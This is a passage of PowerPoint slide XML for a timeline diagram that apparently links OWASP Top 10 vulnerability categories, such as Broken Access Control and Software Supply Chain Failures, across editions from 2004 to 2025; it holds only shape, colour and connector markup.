              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1485E2-25E3-C740-C0F7-4F7DF5300109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628080" y="2913480"/>
            <a:ext cx="40716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72" name="Straight Arrow Connector 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB60DE2-835A-67E1-4578-929477E60B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358720" y="2913480"/>
            <a:ext cx="40752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73" name="Straight Arrow Connector 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E34A43-68E2-3735-EFF4-648019F84916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1214" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="3414060"/>
            <a:ext cx="362880" cy="198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75" name="Straight Arrow Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3DA25E-93AC-F229-6B57-A0ECE8B9B6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="1193" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889340" y="1428840"/>
            <a:ext cx="436500" cy="540"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975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76" name="Connector: Curved 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFE7F35-E046-C14A-73B6-7B9136646912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1222" idx="3"/>
            <a:endCxn id="1218" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1173600" y="3910140"/>
            <a:ext cx="31212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FF7B59"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1277" name="Straight Arrow Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0B37DC-BCB2-48A3-15EA-42D3F8227D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199920" y="4888080"/>
            <a:ext cx="407520" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975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78" name="Straight Arrow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B991EF2-5A9C-0C2D-3451-5C2100BBEBEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2369160" y="5367600"/>
            <a:ext cx="407520" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1279" name="Connector: Curved 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BD01C3-C9CB-EAED-FA52-7177BB9FDD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1204" idx="3"/>
            <a:endCxn id="1200" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="1925460"/>
            <a:ext cx="343440" cy="49320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80" name="Connector: Curved 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDC69DD-DDD2-F4F9-64D3-E55ECD30C56F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1215" idx="3"/>
            <a:endCxn id="1311" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="3407940"/>
            <a:ext cx="343440" cy="149472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82" name="Connector: Curved 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7BB347B-7D17-815B-95FB-C73A8F69AA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1205" idx="3"/>
            <a:endCxn id="1201" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="34164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FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1283" name="Connector: Curved 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{716A9E4A-FD8A-EE98-9C4A-BA8596EDEFB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1199" idx="3"/>
            <a:endCxn id="1227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="341640" cy="248076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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1284" name="Connector: Curved 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{439A7F85-6CFF-C5FA-037B-179A86508506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1244" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265440" y="2920860"/>
            <a:ext cx="325440" cy="493200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52266"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1285" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4D049E-5AE5-DB54-91B2-FCD517031A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1246" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6253560" y="3414060"/>
            <a:ext cx="33732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808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1286" name="Connector: Curved 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDBA6A5-1B62-3675-76EB-D5E4BAD0BBD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1311" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3902580"/>
            <a:ext cx="179640" cy="1000080"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1287" name="Connector: Curved 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE07226-4A5A-0896-AB57-3853034035FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1245" idx="3"/>
            <a:endCxn id="1246" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967640" y="3414060"/>
            <a:ext cx="35640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808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1288" name="Straight Arrow Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F9B6CB-91A6-0D07-D918-7F490EBE3FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383560" y="3899160"/>
            <a:ext cx="395640" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FF7B59"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1290" name="Connector: Curved 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C7A4BE6-5C13-C3A7-9C40-79AE32AEDD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1224" idx="3"/>
            <a:endCxn id="1220" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3910140"/>
            <a:ext cx="343440" cy="487080"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2CD186-6F9E-6830-8850-564F75D5FCE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7882200" y="1220040"/>
            <a:ext cx="93348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Broken Access Control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3" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F843F5AB-B1BD-0BA5-DBFC-E793DED086AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="2691000"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Cryptographic Failures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4" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B1A671-26E9-DBD0-B2D2-2109B87551C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="3683160"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="FFE575"/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dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Insecure </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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5" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379E39D9-3D0E-3DA6-471D-AA6236F245A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="2194560"/>
            <a:ext cx="933480" cy="4186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Software Supply Chain Failures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6" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4587CB52-457C-7995-054B-34E3A2501B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="4179240"/>
            <a:ext cx="93348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Authentication Failures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7" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C95165-370D-BDFC-7555-A2DDB9EC370D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="4675680"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFE575"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="CCCCCC"/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Software &amp; Data Integrity Failures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8" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15CEB2F-AF4E-0728-9565-72799DD12BB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="5171760"/>
            <a:ext cx="93348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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t> Logging &amp; Alerting Failures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9" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEEB747C-3C00-9F59-7EBE-24941C2EFBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="5667840"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7B5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Mishandling Exceptional Conditions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0" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0124EC9-FA40-0055-C360-E010B6966139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872120" y="1698480"/>
            <a:ext cx="93888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Security Misconfig.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301" name="Straight Arrow Connector 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24265984-1F2D-B7FE-9EA9-F9F10A7BE648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1195" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1429200"/>
            <a:ext cx="36468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sp>
        <p:nvSpPr>
          <p:cNvPr id="1302" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96F97108-9306-43FC-03D0-3006EFF2ECF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588720" y="4693320"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFE575"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="CCCCCC"/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Software &amp; Data Integrity Failures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303" name="Straight Arrow Connector 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C8DA27-6A29-E44C-D2B0-56DCBAE4E73E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462080" y="5381280"/>
            <a:ext cx="40356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304" name="Connector: Curved 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAD4822-6C2E-5109-D01B-19100159C7DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1243" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="1429380"/>
            <a:ext cx="364320" cy="4465440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33807"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F60BBB4-CE45-FD09-D3AE-6B329688FF95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7879320" y="3187080"/>
            <a:ext cx="92448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306" name="Straight Arrow Connector 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84CA9D88-188C-4381-8C94-99C3E96D2C07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481160" y="4365000"/>
            <a:ext cx="40356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307" name="Connector: Curved 168">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B088963B-5FDA-002A-C74D-DAAB8F5EC6F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1212" idx="3"/>
            <a:endCxn id="1294" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="2917980"/>
            <a:ext cx="357120" cy="97452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308" name="Straight Arrow Connector 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7B691F-E536-24F4-B9F0-260F43CE7F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="1297" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517160" y="4884840"/>
            <a:ext cx="358200" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="TextBox 188">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FDB32AD-51BE-FA47-C039-B20244E56E0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384480" y="957600"/>
            <a:ext cx="8374680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0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>2004                        2007                        2010                         2013                       2017                         2021                        2025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1" name="CustomShape 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90A49A4B-1B43-F4E5-2791-1B90E0B4459A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="4693320"/>
            <a:ext cx="9277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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/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312" name="Connector: Curved 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909FBD03-726E-7DCC-880D-EBFF385DEEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1247" idx="3"/>
            <a:endCxn id="1300" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7520400" y="1907640"/>
            <a:ext cx="352080" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51279"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 48925"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1313" name="Connector: Curved 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D329EE-D05A-42AA-C58F-063DDA59CCD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1235" idx="3"/>
            <a:endCxn id="1221" idx="1"/>
          </p:cNvCxnSpPr>
